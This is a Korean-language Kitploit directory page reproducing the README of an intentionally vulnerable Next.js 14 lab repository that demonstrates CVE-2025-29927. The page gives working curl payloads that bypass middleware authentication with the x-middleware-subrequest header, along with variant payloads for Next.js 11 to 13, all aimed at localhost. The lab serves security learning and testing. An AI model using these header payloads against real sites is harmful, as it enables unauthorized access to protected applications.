Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
vulnerable-nextjs-14-CVE-2025-29927 | Kitploit
도구/GitHubGitHub/lirantal/vulnerable-nextjs-14-cve-2025-29927
Authentication & AuthorizationVulnerability AnalysisWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHublirantal/vulnerable-nextjs-14-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1482개월 전아직 검토되지 않음

CVE-2025-29927 인증 우회 재현

이 저장소는 next 패키지의 CVE-2025-29927 취약점을 재현한 것입니다.

재현 방법

  1. 아래 단계에 따라 Next.js 애플리케이션을 클론하고 실행합니다.
  2. /api/hello 엔드포인트에 대한 액세스가 인증으로 거부되는지 테스트합니다.
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. 토큰이 제공되면 인증이 작동하는지 테스트합니다.
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. 이제 middleware를 특수 x-middleware-subrequest 헤더에 5번 중첩해도 우회할 수 있습니다:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

이전 Next.js 버전에서의 CVE-2025-29927 악용

Next.js 12 및 13 버전에서는 미들웨어 파일의 명명 규칙이 달랐으며(_middleware.js), Next.js 14에서 middleware.js로 변경되었습니다. 이 취약점은 이전 버전에서 _middleware.js 파일을 사용하여 악용할 수 있습니다.

예를 들어, Next.js 버전과 라우팅 규칙에 따라 다음 페이로드가 적용됩니다:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (Next.js 12.2 버전에서 middleware.js 파일이 pages 디렉터리 내부가 아닌 앱 루트에 있는 경우)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (Next.js 11부터 12.2까지의 버전용)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

시작하기

먼저 개발 서버를 실행합니다:

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

브라우저에서 http://localhost:3000을 열어 결과를 확인하세요.

app/page.js를 수정하여 페이지 편집을 시작할 수 있습니다. 파일을 편집하면 페이지가 자동으로 업데이트됩니다.

이 프로젝트는 next/font를 사용하여 Vercel의 새로운 글꼴 패밀리인 Geist를 자동으로 최적화하고 로드합니다.

더 알아보기

Next.js에 대해 자세히 알아보려면 다음 리소스를 참조하세요:

  • Next.js 문서 - Next.js 기능과 API에 대해 알아보세요.
  • Next.js 배우기 - 대화형 Next.js 튜토리얼입니다.

Next.js GitHub 저장소를 확인해 보세요. 피드백과 기여는 언제나 환영합니다!

Vercel에 배포

Next.js 앱을 배포하는 가장 쉬운 방법은 Next.js 제작자가 만든 Vercel Platform을 사용하는 것입니다.

자세한 내용은 Next.js 배포 문서를 확인하세요.

기여

이 프로젝트에 기여하기 위한 지침은 CONTRIBUTING을 참조하세요.

도구 다운로드